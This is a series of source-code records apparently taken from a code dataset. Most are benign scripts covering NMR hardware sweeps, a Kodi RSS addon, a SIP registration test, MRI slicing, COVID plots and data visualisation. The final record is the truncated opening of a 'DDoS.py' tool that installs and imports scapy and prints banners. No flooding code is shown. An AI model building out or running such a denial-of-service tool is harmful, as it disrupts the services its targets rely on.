argparse.ArgumentParser(\"comparemodels\")\nparser.add_argument(\"--new_model_location\", type=str, help=\"new_model_location directory\")\nparser.add_argument(\"--prod_model_location\", type=str, help=\"prod_model_location directory\")\nparser.add_argument(\"--model_version\", type=str, help=\"model_version\")\nparser.add_argument(\"--compare_result\", type=str, help=\"compare_result directory\")\n\nargs = parser.parse_args()\n\nprint(f\"Argument 1: {args.new_model_location}\")\nprint(f\"Argument 2: {args.prod_model_location}\")\nprint(f\"Argument 3: {args.model_version}\")\nprint(f\"Argument 4: {args.compare_result}\")\n\nif not (args.compare_result is None):\n\tos.makedirs(args.compare_result, exist_ok=True)\n\tprint(f\"{args.compare_result} created\")\n","sub_path":"scripts/compare/comparemodels.py","file_name":"comparemodels.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"365604245","text":"'''\nCreated on Mar 30, 2018\n\n@author: David Ariando\n\nEdits: Cheng Chen, 07/2020, add automatic tuning\n08/2020, run in 10KHz spacing\n\nDescription: NMR sweep measurements for multiple customized frequencies\n'''\n\n#!/usr/bin/python\n\nimport os\nimport time\n\nfrom nmr_std_function.data_parser import parse_simple_info\nfrom nmr_std_function.nmr_functions import compute_iterate\nfrom nmr_std_function.nmr_class import tunable_nmr_system_2018\nfrom nmr_std_function.data_parser import parse_csv_float2col\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nimport pydevd\nimport numpy as np\nfrom datetime import datetime\nimport shutil\nfrom nmr_std_function import data_parser\n\n# variables\ndata_folder = \"/root/NMR_DATA\"\nen_scan_fig = 0\nen_fig = 0\nen_remote_dbg = 0\nfig_num = 100\ndirect_read = 0 # perform direct read from SDRAM. use with caution above!\n\ntx_sd_msk = 1 # 1 to shutdown 8tx opamp during reception, or 0 to keep it powered up during reception\nen_dconv = 1 # enable downconversion in the fpga\ndconv_fact = 4 # downconversion factor. minimum of 4.\n\nprocess_data = 0\npara_folder = \"/root/nmr_pcb20_hdl10_2018/MAIN_nmr_code/para\"\nload_para = 1 # load parameter for matching network and preamp\n\n# instantiate nmr object\nnmrObj = tunable_nmr_system_2018( data_folder, en_remote_dbg )\n\n# cpmg settings\n#cpmg_freq = 1.99\npulse1_dtcl = 0.5 # useless with current code\npulse2_dtcl = 0.5 # useless with current code\necho_spacing_us = 500\nscan_spacing_us = 22000\nsamples_per_echo = 2048 # number of points\nechoes_per_scan = 40 # number of echos\ninit_adc_delay_compensation = 20 # acquisition shift microseconds\nnumber_of_iteration = 1000 # number of averaging\nph_cycl_en = 1\npulse180_t1_int = 0\ndelay180_t1_int = 0\necho_skip = 1\n\npulse1_us = 30 # pulse pi/2 length\npulse2_us = 45 #pulse_us_sw[i] # pulse pi length\n\n# sweep settings\nFreq_step = 1 # number of steps\n\ncpmg_freq_sta = 2.18 # in MHz\ncpmg_freq_sto = 2.18 # in MHz\ncpmg_freq_sw = np.linspace(cpmg_freq_sta, cpmg_freq_sto, Freq_step)\n\ncpmg_freq_sw[0]=2.02\n#cpmg_freq_sw[1]=2.12\n#cpmg_freq_sw[2]=2.08\n#cpmg_freq_sw[3]=2.03\n#cpmg_freq_sw[4]=1.99\n#cpmg_freq_sw[5]=1.95\n#cpmg_freq_sw[6]=1.91\n#cpmg_freq_sw[7]=1.87\n#cpmg_freq_sw[8]=1.83\n#cpmg_freq_sw[9]=1.79\n#cpmg_freq_sw[10]=1.75\n#cpmg_freq_sw[11]=1.71\n#cpmg_freq_sw[12]=1.76\n#cpmg_freq_sw[13]=1.73\n#cpmg_freq_sw[14]=1.70\n#cpmg_freq_sw[15]=1.67\n\ncpmg_freq_sta = number_of_iteration # in MHz\ncpmg_freq_sto = number_of_iteration # in MHz\ncpmg_NI_sw = np.linspace(cpmg_freq_sta, cpmg_freq_sto, Freq_step)\n\ncpmg_NI_sw[0]=10\n#cpmg_NI_sw[1]=8000\n#cpmg_NI_sw[2]=8000\n#cpmg_NI_sw[3]=8000\n#cpmg_NI_sw[4]=8000\n#cpmg_NI_sw[5]=8000\n#cpmg_NI_sw[6]=8000\n#cpmg_NI_sw[7]=8000\n#cpmg_NI_sw[8]=8000\n#cpmg_NI_sw[9]=8000\n#cpmg_NI_sw[10]=8000\n#cpmg_NI_sw[11]=8000\n#cpmg_NI_sw[12]=8000\n#cpmg_NI_sw[13]=8000\n#cpmg_NI_sw[14]=8000\n#cpmg_NI_sw[15]=8000\n\n\n# system setup\n# system setup\nnmrObj.initNmrSystem() # necessary to set the GPIO initial setting\n# nmrObj.turnOnPower()\nnmrObj.assertControlSignal( nmrObj.PSU_15V_TX_P_EN_msk | nmrObj.PSU_15V_TX_N_EN_msk | nmrObj.PSU_5V_TX_N_EN_msk |\n nmrObj.PSU_5V_ADC_EN_msk | nmrObj.PSU_5V_ANA_P_EN_msk |\n nmrObj.PSU_5V_ANA_N_EN_msk )\n\n\n\nnow = datetime.now()\ndatename = now.strftime( \"%Y_%m_%d_%H_%M_%S\" )\n\n# define the name of the directory to be created\ndst_path = data_folder + '/' + datename + '_FreqSweep'\n\ntry:\n os.mkdir(dst_path)\nexcept OSError:\n print (\"Creation of the directory %s failed\" % dst_path)\nelse:\n print (\"Successfully created the directory %s \" % dst_path)\n\na_integ_table = np.zeros( Freq_step )\nfor i in range( 0, Freq_step ):\n print( '----------------------------------' )\n print( 'frequency = ' + str( cpmg_freq_sw[i] ) + ' MHz' )\n\n \n #cpmg_freq=cpmg_freq_sw[i]\n \n # compensate for setup \n freq_comp = cpmg_freq_sw[i]+0.10\n freqS21_comp = cpmg_freq_sw[i]\n number_of_iteration=cpmg_NI_sw[i]\n if (load_para):\n # parameter from \n ( FreqList, s11List, CparList, CserList ) = data_parser.parse_csv_float4col_s11( \n para_folder, '/genS11Table_final_input_10k.txt' ) # read file\n Cpar = int(CparList[[i for i, elem in enumerate( FreqList ) if abs( elem - freq_comp) < 0.01][0]])\n Cser = int(CserList[[i for i, elem in enumerate( FreqList ) if abs( elem - freq_comp) < 0.01][0]])\n \n ( FreqList_S21, PeakVoltage, VvaracList, VbiasList ) = data_parser.parse_csv_float4col_s11( \n para_folder, '/genS21Table_input_10k.txt' ) # read file\n Vbias = VbiasList[[i for i, elem in enumerate( FreqList_S21 ) if abs( elem - freqS21_comp) < 0.01][0]]\n Vvarac = VvaracList[[i for i, elem in enumerate( FreqList_S21 ) if abs( elem - freqS21_comp) < 0.01][0]]\n else:\n Cpar = 563\n Cser = 327\n Vbias = -2.0\n Vvarac = 2.8\n \n nmrObj.setPreampTuning(Vbias, Vvarac)\n nmrObj.setMatchingNetwork(Cpar, Cser)\n\n nmrObj.assertControlSignal( \n nmrObj.RX1_1H_msk | nmrObj.RX1_1L_msk | nmrObj.RX2_L_msk | nmrObj.RX2_H_msk | nmrObj.RX_SEL1_msk | nmrObj.RX_FL_msk | nmrObj.RX_FH_msk | nmrObj.PAMP_IN_SEL2_msk )\n \n #nmrObj.cpmgSequence( cpmg_freq_sw[i], pulse1_us, pulse2_us, pulse1_dtcl, pulse2_dtcl, echo_spacing_us, scan_spacing_us, samples_per_echo,\n # echoes_per_scan, init_adc_delay_compensation, number_of_iteration, ph_cycl_en, pulse180_t1_int, delay180_t1_int,\n # tx_sd_msk, en_dconv, dconv_fact )\n nmrObj.cpmgSequence( cpmg_freq_sw[i], pulse1_us, pulse2_us, pulse1_dtcl, pulse2_dtcl, echo_spacing_us, scan_spacing_us, samples_per_echo,\n echoes_per_scan, init_adc_delay_compensation, number_of_iteration, ph_cycl_en, pulse180_t1_int, delay180_t1_int,\n tx_sd_msk, en_dconv, dconv_fact, echo_skip)\n datain = [] # set datain to 0 because the data will be read from file instead\n meas_folder = parse_simple_info( data_folder, 'current_folder.txt' )\n\n if en_dconv:\n src_file = ( data_folder + '/' + meas_folder[0] + '/dconv')\n dst_file = ( dst_path + '/dconv_{}'.format(i))\n shutil.copy2(src_file, dst_file)\n else:\n src_file = ( data_folder + '/' + meas_folder[0] + '/asum')\n dst_file = ( dst_path + '/asum_{}'.format(i))\n shutil.copy2(src_file, dst_file) \n \n if process_data:\n ( a, a_integ, a0, snr, T2, noise, res, theta, data_filt, echo_avg, Df, t_echospace ) = compute_iterate( \n nmrObj, data_folder, meas_folder[0], 0, 0, 0, direct_read, datain, en_scan_fig, )\n\n a_integ_table[i] = a_integ\n \n if en_fig:\n plt.ion()\n fig = plt.figure( fig_num )\n fig.clf()\n ax = fig.add_subplot( 1, 1, 1 )\n line1, = ax.plot( cpmg_freq_sw[0:i + 1], a_integ_table[0:i + 1], 'b-o' )\n # ax.set_ylim(-50, 0)\n # ax.set_xlabel('Frequency [MHz]')\n # ax.set_ylabel('S11 [dB]')\n # ax.set_title(\"Reflection Measurement (S11) Parameter\")\n ax.grid()\n fig.canvas.draw()\n # fig.canvas.flush_events()\n\n# turn off system\nnmrObj.deassertControlSignal( \n nmrObj.RX1_1H_msk | nmrObj.RX1_1L_msk | nmrObj.RX2_L_msk | nmrObj.RX2_H_msk | nmrObj.RX_SEL1_msk | nmrObj.RX_FL_msk | nmrObj.RX_FH_msk | nmrObj.PAMP_IN_SEL2_msk )\n\nnmrObj.setMatchingNetwork( 0, 0 )\nnmrObj.setPreampTuning( 0, 0 )\nnmrObj.deassertControlSignal( nmrObj.PSU_15V_TX_P_EN_msk | nmrObj.PSU_15V_TX_N_EN_msk | nmrObj.PSU_5V_TX_N_EN_msk |\n nmrObj.PSU_5V_ADC_EN_msk | nmrObj.PSU_5V_ANA_P_EN_msk | nmrObj.PSU_5V_ANA_N_EN_msk )\n\nshutil.copy2(data_folder + '/' + meas_folder[0] + '/acqu.par', dst_path)\n\nfor kk in range( 0, Freq_step ):\n data_parser.write_text_append(dst_path, 'acqu.par', 'Freq = {}'.format(cpmg_freq_sw[kk]))\n\nif en_fig:\n fig.savefig( dst_path + '/' + datename + '_pulsesw.pdf' )\n\n\npass\npass\n","sub_path":"MAIN_nmr_code/nmr_sw_freq_auto.py","file_name":"nmr_sw_freq_auto.py","file_ext":"py","file_size_in_byte":7881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"376908399","text":"import xbmcplugin, xbmcgui, xbmcaddon, urllib2, sys\nimport xml.etree.ElementTree as etree\n\nRSS_FEED = \"http://feeds.feedburner.com/computeractionshowvideo?format=xml\"\n \ndef addLink(name, url):\n li = xbmcgui.ListItem(name, iconImage=\"DefaultVideo.png\")\n li.setProperty(\"IsPlayable\", \"true\")\n li.setInfo(type=\"Video\", infoLabels={\"Title\":name})\n xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=url,listitem=li, isFolder=False)\n \ntry:\n xml = urllib2.urlopen(RSS_FEED).read()\n root = etree.fromstring(xml)\n for itm in root.findall(\"./channel/item\"):\n for itmelems in itm: \n if itmelems.tag == \"title\":\n title = itmelems.text\n elif itmelems.tag == \"enclosure\":\n link = itmelems.attrib[\"url\"]\n\n addLink(title, link)\nexcept Exception as e:\n addLink(\"%s\"%e,\"\")\n\nxbmcplugin.endOfDirectory(int(sys.argv[1]))\n","sub_path":"addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"101583690","text":"# from app import app\nimport urllib.request,json\n# base_url = None\n\ndef get_blogs():\n get_blogs_url = 'http://quotes.stormconsultancy.co.uk/random.json'\n\n with urllib.request.urlopen(get_blogs_url) as url:\n blogs = url.read()\n get_blogs_response = json.loads(blogs)\n \n return get_blogs_response","sub_path":"app/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"313957663","text":"import asyncio\n\n\nasync def add_number(num1, num2):\n await asyncio.sleep(num1)\n print(f\"slept for {num1}\")\n return num1 + num2\n\n\nasync def main():\n res = await asyncio.gather(*(add_number(i, i) for i in range(1, 11)))\n return res\n\nres = asyncio.run(main())\n\nprint(res)\n","sub_path":"demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"127170630","text":"\"\"\"\nCopyright (c) 2018 Cisco Systems, Inc.\nAuthor: \"Christopher Liu\" \n\"\"\"\nfrom tng.api import runner\nfrom tng_sl.contrib.pitstop_helper import PitstopTestCase\nfrom pitstop.exp import Wait, Receive, Send, Flag, Exit, All\n\n\nclass Test(PitstopTestCase):\n\n required_caps = ['multiline']\n\n def test_CSCvi63592_register_fail_no_subscribe(self):\n '''\n This test verifies the case which was reported via CSCvi63592.\n In the original issue when phone register succeeds at the first time\n and fails at the second time, phone still sends out subscribe with\n an error retry interval.\n In this test cases we'll verify that after the second register failure,\n phone will not sent any subscribe message to the server until\n re-register is ok again.\n\n Phone registers for three times, only the second registration fails.\n Check that phone will not send subscribe after the registration failure\n even when the last successful subscribe expires.\n\n 1. Configure line proxy|userid and linekey call park\n 2. Let server return 200 OK to the first register\n 3. Check phone register ok and subscribe ok\n 4. Let server return 500 error to the second register\n 5. Check phone will not send subscribe\n 6. Let server return 200 OK to the third register\n 7. Check phone will send subscribe again\n '''\n self.conf.edit('Extension_2_', 'Disabled')\n self.conf.edit(\n 'Extended_Function_2_',\n 'fnc=prk;sub=$USER@$PROXY;nme=call park;vid=1')\n self.conf.edit('Reg_Retry_Long_Intvl', '60')\n self.conf.edit('Subscribe_Expires', '65')\n\n notify_content = (\n ''\n ''\n '')\n\n self.spec.update({\n 'expect': [\n Wait('idle'),\n Wait('sub_ok'),\n Wait('resub_ok').then([Flag('idle')])\n ],\n\n 'register_subscribe': [\n # first registration, followed by a subscribe\n Receive('REGISTER', {}, transaction_label='r1').then([\n Send('200', {'Expires': '60'}, on_transaction='r1')]),\n Receive('SUBSCRIBE', {\n 'Event': 'x-broadworks-callpark'},\n transaction_label='s1').then([\n Send(\n '200', {}, on_transaction='s1',\n dialog_label='sub_dialog'),\n Send(\n 'NOTIFY', {\n 'Event': 'x-broadworks-callpark',\n 'Subscription-State': 'active;expires=64',\n 'Content-Type': (\n 'application/'\n 'x-broadworks-callpark-info+xml'),\n '\\n': notify_content},\n transaction_label='n1',\n in_dialog='sub_dialog')]),\n Receive('200', {}, on_transaction='n1').then([\n Flag('sub_ok')]),\n # second registration, expect no subscribe from phone\n # if still subscribe, will raise 'in-dialog request unexpected'\n Receive('REGISTER', {}, transaction_label='r2').then([\n Send('500', {}, on_transaction='r2')]),\n # third registration, followed by a subscribe\n Receive('REGISTER', {}, transaction_label='r3').then([\n Send('200', {'Expires': '60'}, on_transaction='r3')]),\n Receive('SUBSCRIBE', {\n 'Event': 'x-broadworks-callpark'},\n transaction_label='s3').then([\n Send(\n '200', {}, on_transaction='s3',\n dialog_label='new_sub_dialog'),\n Send(\n 'NOTIFY', {\n 'Event': 'x-broadworks-callpark',\n 'Subscription-State': 'active;expires=64',\n 'Content-Type': (\n 'application/'\n 'x-broadworks-callpark-info+xml'),\n '\\n': notify_content},\n transaction_label='n3',\n in_dialog='new_sub_dialog')]),\n Receive('200', {}, on_transaction='n3').then([\n Flag('resub_ok')])\n ],\n })\n\n self.pitstop(timer=200)\n\n\ndef main():\n runner()\n","sub_path":"pitstop_tests/cdets/CSCvi63592_register_fail_no_subscribe.py","file_name":"CSCvi63592_register_fail_no_subscribe.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"162376574","text":"from collections import defaultdict\nimport random\n\nfrom tqdm import tqdm\n\nfrom capreolus.utils.common import register_component_module, import_component_modules\nfrom capreolus.utils.loginit import get_logger\n\nlogger = get_logger(__name__) # pylint: disable=invalid-name\n\n\nclass Benchmark:\n ALL = {}\n\n def __init__(self, search_run, collection, pipeline_config):\n self.search_run = search_run\n self.collection = collection\n self.pipeline_config = pipeline_config\n self.extractor = None # Need this to transform training tuples with ids into embedding features\n self.reranking_runs = {}\n\n def set_extractor(self, extractor):\n self.extractor = extractor\n\n def build(self):\n \"\"\" Initialization method for subclasses to override \"\"\"\n raise NotImplementedError\n\n def create_and_store_train_and_pred_pairs(self, folds):\n \"\"\"\n Based on runs, generate and store pairs of (q_id, doc_ids) for future use.\n \"\"\"\n # the run selected to rerank for each fold\n self.reranking_runs = {}\n\n # train on only docs that show up in the searcher? (rather than all judged docs)\n self.train_pairs = self.collection.qrels\n if self.pipeline_config[\"rundocsonly\"]:\n self.train_pairs = {}\n\n # predict on only the docs to rerank (not on all judged docs)\n self.pred_pairs = {}\n\n for name, d in folds.items():\n dev_qids = set(d[\"train_qids\"]) | set(d[\"predict\"][\"dev\"])\n test_qids = set(d[\"predict\"][\"test\"])\n full_search_run = self.search_run.crossvalidated_ranking(dev_qids, test_qids, full_run=True)\n self.reranking_runs[name] = full_search_run\n search_run = {qid: docscores for qid, docscores in full_search_run.items() if qid in test_qids}\n\n for qid, docscores in search_run.items():\n self.pred_pairs.setdefault(qid, []).extend(docscores.keys())\n\n if self.pipeline_config[\"rundocsonly\"]:\n for qid, docscores in self.search_run.crossvalidated_ranking(dev_qids, set(d[\"train_qids\"])).items():\n self.train_pairs.setdefault(qid, set()).update(docscores.keys())\n\n def get_features(self, d):\n d = self.extractor.transform_qid_posdocid_negdocid(d[\"qid\"], d[\"posdocid\"], d.get(\"negdocid\"))\n return d\n\n def pred_tuples(self, pred_pairs):\n if self.pipeline_config[\"sample\"] == \"simple\":\n return self.simple_pred_tuples(pred_pairs)\n\n return None\n\n def training_tuples(self, qids):\n if self.pipeline_config[\"sample\"] == \"simple\":\n return self.simple_training_tuples(qids)\n\n return None\n\n def simple_pred_tuples(self, pred_pairs):\n def predgenf():\n batch = defaultdict(list)\n for qid in tqdm(pred_pairs):\n for posdocid in pred_pairs[qid]:\n features = self.get_features({\"qid\": qid, \"posdocid\": posdocid})\n if features is None:\n logger.warning(\"predict got none features: qid=%s docid=%s\", qid, posdocid)\n continue\n\n for k, v in features.items():\n batch[k].append(v)\n\n if len(batch[\"qid\"]) == self.pipeline_config[\"batch\"]:\n yield self.prepare_batch(batch)\n batch = defaultdict(list)\n\n if len(batch[\"qid\"]) > 0:\n missing = self.pipeline_config[\"batch\"] - len(batch[\"qid\"])\n for k in batch:\n batch[k] = batch[k] + ([batch[k][-1]] * missing)\n yield self.prepare_batch(batch)\n\n logger.debug(\"Starting to get {0} pred pairs\".format(len(pred_pairs)))\n x = list(predgenf())\n logger.debug(\"Done getting pred pairs\")\n return x\n\n def get_posdocs_and_negdocs_for_qids(self, qids):\n labels = {\n qid: {docid: label for docid, label in self.collection.qrels[qid].items() if docid in self.train_pairs[qid]}\n for qid in qids\n }\n\n reldocs = {qid: [docid for docid, label in labels[qid].items() if label > 0] for qid in labels}\n negdocs = {qid: [docid for docid, label in labels[qid].items() if label <= 0] for qid in labels}\n\n return reldocs, negdocs\n\n def simple_training_tuples(self, qids):\n qid_order = [qid for qid in qids if qid in self.train_pairs and qid in self.collection.qrels]\n\n reldocs, negdocs = self.get_posdocs_and_negdocs_for_qids(qid_order)\n for qid in list(qid_order):\n if len(reldocs.get(qid, [])) == 0 or len(negdocs.get(qid, [])) == 0:\n qid_order.remove(qid)\n logger.warning(\"skipping qid=%s with no positive and/or negative samples\", qid)\n\n def genf():\n batch = defaultdict(list)\n while True:\n random.shuffle(qid_order)\n for qid in qid_order:\n posdocid = random.choice(reldocs[qid])\n negdocid = random.choice(negdocs[qid])\n\n features = self.get_features({\"qid\": qid, \"posdocid\": posdocid, \"negdocid\": negdocid})\n if features is None:\n logger.warning(\"got none features: qid=%s posid=%s negid=%s\", qid, posdocid, negdocid)\n continue\n\n for k, v in features.items():\n batch[k].append(v)\n\n if len(batch[\"qid\"]) == self.pipeline_config[\"batch\"]:\n yield self.prepare_batch(batch)\n batch = defaultdict(list)\n\n return genf()\n\n def prepare_batch(self, batch):\n return batch\n\n @staticmethod\n def config():\n raise NotImplementedError(\"config method must be provided by subclass\")\n\n @classmethod\n def register(cls, subcls):\n return register_component_module(cls, subcls)\n\n\nimport_component_modules(\"benchmark\")\n","sub_path":"capreolus/benchmark/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"604011087","text":"import os\r\nfrom typing import Tuple\r\n\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\n\r\nfrom common import patient_slice_generator\r\nfrom config import reu2018\r\nfrom patient import Patient\r\nfrom utils import get_dir_list, read_file, save_slice_pair\r\n\r\n\r\ndef slice_mri_data(config):\r\n ff = get_dir_list(config['mri_dir'])\r\n ff1 = config['mri_dir'] / ff[0]\r\n dirs = get_dir_list(ff1)\r\n\r\n for subject_dir in tqdm(dirs, total=len(dirs), desc=\"Patients\"):\r\n #direction = config['mri_dir']/ subject_dir\r\n direction = ff1 / subject_dir\r\n patient = process_directory(direction, config)\r\n\r\n if not patient.check_valid():\r\n continue\r\n\r\n slice_gen = patient_slice_generator(patient, config)\r\n \r\n for image_slice, mask_slice, idx in slice_gen:\r\n\r\n #idx = 0.5???\r\n # if os.path.isfile(str(config['sliced_mri_data_dir'] / '{}'.format(patient.id) / '{}_{}.png'.format(patient.id, idx))) and \\\r\n # os.path.isfile(str(config['sliced_mri_mask_dir'] / '{}'.format(patient.id) / '{}_{}.png'.format(patient.id, idx))):\r\n # continue\r\n\r\n\r\n if type(config['slice_mode']) == str:\r\n if config['slice_mode'] == 'tumor_only':\r\n #if np.max(mask_slice) == 1:\r\n if idx == 128/2:\r\n for i in range(20):\r\n idm = idx - 10 + i\r\n save_slice_pair(patient.id, idm, image_slice, mask_slice, config)\r\n elif config['slice_mode'] == 'all':\r\n if np.sum(image_slice) > 64:\r\n save_slice_pair(patient.id, idx, image_slice, mask_slice, config)\r\n else:\r\n raise ValueError(\"Invalid slice_mode entered in configuration.\")\r\n elif type(config['slice_mode'] == Tuple[int, int]):\r\n if config['slice_mode'][0] < idx < config['slice_mode'][1]:\r\n save_slice_pair(patient.id, idx, image_slice, mask_slice, config)\r\n else:\r\n raise ValueError(\"Invalid slice_mode entered in configuration.\")\r\n save_slice_pair(patient.id, idx, image_slice, mask_slice, config)\r\n\r\ndef process_directory(_dir, config):\r\n my_patient = Patient(_dir.parts[-1])\r\n\r\n extension = config['mri_file_extensions']\r\n if extension == '*.nii.gz':\r\n for mri_file in _dir.glob(extension):\r\n name1 = config['data_filename_contains'] + '.nii.gz'\r\n name2 = config['mask_filename_contains'] + '.nii.gz'\r\n if name1 == mri_file.parts[-1]:\r\n data, _ = read_file(mri_file)\r\n my_patient.add_data(data)\r\n if config['mask_filename_contains'] in mri_file.parts[-1]:\r\n mask, _ = read_file(mri_file)\r\n my_patient.add_mask(mask)\r\n\r\n return my_patient\r\n\r\n\r\nif __name__ == \"__main__\":\r\n slice_mri_data(reu2018)\r\n","sub_path":"Desktop/Research/unet2dforgithub/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"252341380","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\n\n\n# %%\n\ndb = pd.read_csv(\"https://raw.githubusercontent.com/OxCGRT/covid-policy-tracker/master/data/OxCGRT_latest.csv\",\n low_memory=False)\n\ndb.sort_values(by=['CountryName', 'RegionName', 'Date'])\n\n\n# %%\n\ndef cases_plots(name, \n region_name='',\n show_moving_average=True,\n days_for_average=7,\n weights='default',\n show_deaths=False,\n show_total=False):\n\n \n state = db[db['CountryName']==name]\n \n if region_name != '':\n state = state[state['RegionName']==region_name]\n region_name = ' ('+region_name+') '\n \n day_cases = np.ediff1d(state['ConfirmedCases'])\n plt.plot(state['Date'][:-1].astype(str), day_cases, 'b', label='daily cases')\n \n if show_deaths == True:\n day_deaths = np.ediff1d(state['ConfirmedDeaths'])\n plt.plot(state['Date'][:-1].astype(str), day_deaths, 'grey', label='daily deaths')\n \n if show_moving_average == True:\n \n convolve_mode='valid'\n \n # remember that weights are flipped, they go from last to first\n if weights=='default':\n weights = np.ones(days_for_average)/days_for_average\n else:\n weights = np.asarray(weights)\n \n if np.sum(weights) != 1.:\n weights = weights/np.sum(weights)\n \n assert(len(weights)==days_for_average)\n \n avg_cases = np.convolve(day_cases, weights, convolve_mode)\n plt.plot(state['Date'][int(days_for_average/2):-int(days_for_average/2)-days_for_average%2].astype(str), avg_cases, 'r', label=str(days_for_average)+'-days moving average cases')\n\n \n if show_deaths == True:\n avg_deaths = np.convolve(day_deaths, weights, convolve_mode)\n plt.plot(state['Date'][int(days_for_average/2):-int(days_for_average/2)-days_for_average%2].astype(str), avg_deaths, 'k', label=str(days_for_average)+'-days moving average deaths')\n\n \n if show_total == True:\n \n plt.plot(state['Date'][:].astype(str), state['ConfirmedCases'], label='total cases')\n \n if show_deaths == True:\n plt.plot(state['Date'][:].astype(str), state['ConfirmedDeaths'], label='total deaths')\n \n\n \n final_pos, final_tic = [], []\n \n for pos, tic in zip(plt.xticks()[0], plt.xticks()[1]):\n if pos%30==0:\n final_pos.append(pos)\n final_tic.append(str(state.Date.iloc[pos])[4:6]+'/'+str(state.Date.iloc[pos])[6:])\n \n \n plt.xticks(final_pos, final_tic)\n \n plt.xlabel(\"Day (MM/DD)\")\n plt.ylabel(\"Counts\")\n plt.title(name+region_name+\" Covid-19 cases\")\n plt.grid()\n plt.legend()\n \n plt.show()\n \n \n \n# %%\n\ncases_plots(name='United Kingdom', # Use capital letter for each distinct word and space between them\n region_name='England',\n# weights=[1, 1, 1, 100, 100, 1, 1, 1], # if you want to use your own weights\n days_for_average=7) # suggestion: use an odd number to have the sliding window \"centered\" over a single day\n\n","sub_path":"personal/LD/Cases_plots.py","file_name":"Cases_plots.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299445438","text":"# http://judge.u-aizu.ac.jp/onlinejudge/description.jsp?id=ITP2_3_C&lang=jp\n# Count\n\nfrom functools import reduce\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\n\ndef main():\n n = int(input())\n l = list ( map(int,input().split()))\n\n for i in range(int(input())):\n (n1,n2,a) = map(int,input().split()) \n count = len(list(filter(lambda x : x == a,l[n1:n2])))\n print (count)\n\nif __name__ == '__main__':\n main()","sub_path":"ITP2/ITP2_3_C.py","file_name":"ITP2_3_C.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"535783527","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef open_file(file_title):\n f = open(f'{file_title}', 'r', encoding = 'utf-8')\n file = f.readlines()\n\n table = []\n for row in file:\n row = row.replace('\",', '+').replace(',\"', '+')\n table.append(row.rstrip().split('+'))\n \n f.close()\n return table\n \n\ndef column_data(table):\n date = []\n link = []\n trafic = []\n date_time = []\n port = []\n\n column = [date, link, trafic, date_time, port]\n\n for row in table:\n for i in range(len(row)):\n if i >= len(column):\n break\n column[i].append(row[i]) \n\n return column\n \n\ndef count_trafics(column):\n \n count = column[2]\n time = column[3]\n\n all_trafic = []\n summ_insecond = [count[0]]\n \n for num in range(1, len(time)):\n if time[num-1] == time[num]:\n summ_insecond.append(count[num])\n else:\n part = [time[num-1], sum(summ_insecond)]\n all_trafic.append[part]\n summ_insecond = []\n \n number = []\n datetime = []\n for row in all_trafic:\n number.append(row[0])\n datetime.append(row[-1])\n \n list_trafic = [number, datetime]\n \n return list_trafic\n\n\ndef mk_viz(column, count_trafic): \n time = list(column[3])\n count = list(column[2])\n\n for_viz = count_trafic(count, time)\n viz = pd.DataFrame(for_viz,\n columns = ['Время', 'Количество трафика'])\n\n number = count_trafic[0]\n datime = count_trafic[1]\n\n viz.loc[number, datime].plot()\n plt.title('Распределение трафика за указанный период')\n plt.ylabel('Количество трафика')\n plt.xlabel('Время')\n plt.savefig('doc_for_send/data_14-10-2021.png')\n\n","sub_path":"table_1_volume_data.py","file_name":"table_1_volume_data.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"626287540","text":"#DDoS.py\n\n#Imports:\nimport os\nimport sys\nimport subprocess\nimport asyncio\nfrom platform import platform\nfrom os import listdir\nos.system('pip3 install scapy')\nfrom scapy.all import *\nimport threading\n\n\n\n\nversion = 'v Alpha 0.1'\n\n# Change version in var\n\ntitle = '''\n\nA DDoS/ DoS script written in Python, the upgraded version of the Batch version.\n\nsrforek\n\n __ _ ___ ___ __ _ ___ __ __ __ __\n| \\| |_ | __| \\| (_ | __ | _\\| _\\ /__\\ /' _/\n| | ' |/ /| _|| | ' |/ / |__| | v | v | \\/ |`._`.\n|_|\\__|___|___|_|\\__|___| |__/|__/ \\__/ |___/\n\n\n'''+version+'''\n\n:DDoS/ DoS python script:\n\nBy editor99\n\n\nGithub repo: https://github.com/Gteditor99/DDOS-Nzen2\n\nYoutube: https://www.youtube.com/channel/UCrxNyJTsVtg5pSq3AYbhiAw\n\nDiscord: editor99#6207\n\n\n\n '''\n\n\nlogoascii = '''\n\n __ _ ___ ___ __ _ ___ __ __ __ __\n| \\| |_ | __| \\| (_ | __ | _\\| _\\ /__\\ /' _/\n| | ' |/ /| _|| | ' |/ / |__| | v | v | \\/ |`._`.\n|_|\\__|___|___|_|\\__|___| |__/|__/ \\__/ |___/\n\n\n\n '''\n\n\n\n\n# Function for Main Screen, 